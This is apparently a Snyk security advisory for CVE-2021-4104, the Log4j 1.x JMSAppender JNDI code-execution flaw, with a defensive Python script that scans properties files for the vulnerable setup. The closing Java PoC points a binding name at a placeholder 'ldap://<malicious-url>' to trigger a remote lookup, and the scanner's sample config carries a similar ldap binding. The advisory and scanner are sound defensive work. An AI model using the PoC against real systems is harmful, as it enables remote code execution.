Arbitrary Code Execution Affecting log4j:log4j package, versions [0,]
Snyk ID SNYK-JAVA-LOG4J-2316893
- published 13 Dec 2021
- disclosed 10 Dec 2021
- credit Unknown
Introduced: 10 Dec 2021
CVE-2021-4104
How to fix?
There is no fixed version for log4j:log4j.
Overview
log4j:log4j is the 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015 and is no longer supported.
Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.
In order to leverage this vulnerability the following conditions must be met:
- The application has enabled JMSAppender (or a class that extends JMSAppender)
- The attacker has access to directly modify the TopicBindingName or TopicConnectionFactoryBindingName configuration variables, which is an unlikely scenario
If these conditions are met, log4j 1.x resolves these configuration values through a JNDI lookup that does not protect against attacker-controlled LDAP and other JNDI-related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when it is loaded from an LDAP server.
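Both preconditions above are visible in a Log4j 1.x properties configuration: an appender declared as org.apache.log4j.net.JMSAppender, and a TopicBindingName or TopicConnectionFactoryBindingName pointing at a remote JNDI scheme. The script below is an added example written for this page, not Snyk's or the Log4j project's code. The property names and appender class are the real Log4j 1.x ones; the two sample configurations are constructed, and the severity labels are the script's own convention. It goes slightly beyond the advisory by also flagging the other remote JNDI schemes (rmi, dns, iiop, corbaname), not just ldap.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Appender class named in the advisory (CVE-2021-4104).
JMS_APPENDER_CLASS = "org.apache.log4j.net.JMSAppender"
# The two JMSAppender properties that are handed to a JNDI lookup.
JNDI_LOOKUP_PROPERTIES = ("TopicBindingName", "TopicConnectionFactoryBindingName")
# URL schemes that JNDI resolves from a remote endpoint; a binding name using one
# of these is the dangerous case (the advisory names ldap; the rest are added here).
REMOTE_JNDI_SCHEMES = ("ldap:", "ldaps:", "rmi:", "dns:", "iiop:", "corbaname:")


@dataclass
class Finding:
    appender: str   # appender name from log4j.appender.<name>
    property: str   # offending property, or "" for the appender declaration itself
    value: str
    severity: str   # "high" / "medium" / "low" (this script's own scale)


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal parser for log4j 1.x .properties files (key=value or key:value, # or ! comments)."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def audit_log4j_config(text: str) -> List[Finding]:
    """Flag JMSAppender declarations and binding names that would trigger a remote JNDI lookup.

    Caveat: a subclass that extends JMSAppender (the other case in the advisory) has a
    different class name and is not caught by this exact-class check.
    """
    props = parse_properties(text)
    findings: List[Finding] = []
    for key, value in props.items():
        # Appender declarations look like: log4j.appender.<name>=<class>
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if not m or value != JMS_APPENDER_CLASS:
            continue
        name = m.group(1)
        # Precondition 1: JMSAppender is enabled at all.
        findings.append(Finding(name, "", value, "medium"))
        # Precondition 2: the binding names JNDI will look up.
        for prop in JNDI_LOOKUP_PROPERTIES:
            val = props.get(f"log4j.appender.{name}.{prop}")
            if val is None:
                continue
            severity = "high" if val.lower().startswith(REMOTE_JNDI_SCHEMES) else "low"
            findings.append(Finding(name, prop, val, severity))
    return findings


# Constructed sample configurations (not taken from any real deployment).
SAMPLE_SAFE = """
log4j.rootLogger=INFO, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
"""

SAMPLE_RISKY = """
# constructed sample: JMSAppender enabled with a remote JNDI binding name
log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.jms.ProviderURL=tcp://localhost:61616
log4j.appender.jms.TopicBindingName=ldap://example.invalid/obj
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
"""

if __name__ == "__main__":
    for label, sample in (("safe", SAMPLE_SAFE), ("risky", SAMPLE_RISKY)):
        print(label)
        for f in audit_log4j_config(sample):
            print(f"  [{f.severity}] appender={f.appender} {f.property or 'JMSAppender declared'} {f.value}")
```

A "medium" finding alone means the appender the advisory names is present; since there is no fixed 1.x version, the practical response is to remove the JMSAppender configuration (and, as Apache recommends for 1.x, the JMSAppender class from the jar) or to migrate off Log4j 1.x. The script reads only the properties format; log4j.xml configurations need a separate XML check.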
PoC
import org.apache.log4j.net.JMSAppender;
// ...
JMSAppender a = new JMSAppender();
// Either binding name is passed to a JNDI lookup; a remote LDAP URL here is the
// attacker-controlled value the advisory describes.
a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>");
// OR a.setTopicBindingName("ldap://<malicious-url>");
// activateOptions() performs the lookup.
a.activateOptions();